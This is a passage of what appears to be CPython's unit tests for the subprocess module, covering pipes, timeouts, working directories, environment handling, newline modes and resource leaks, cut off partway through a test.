class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
self.doCleanups()
support.reap_children()
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
class _PathLikeObj:
def __fspath__(self):
return temp_dir
self._assert_cwd(temp_dir, sys.executable, cwd=_PathLikeObj())
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
'__PYVENV_LAUNCHER__' in n or # MacOS framework build
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
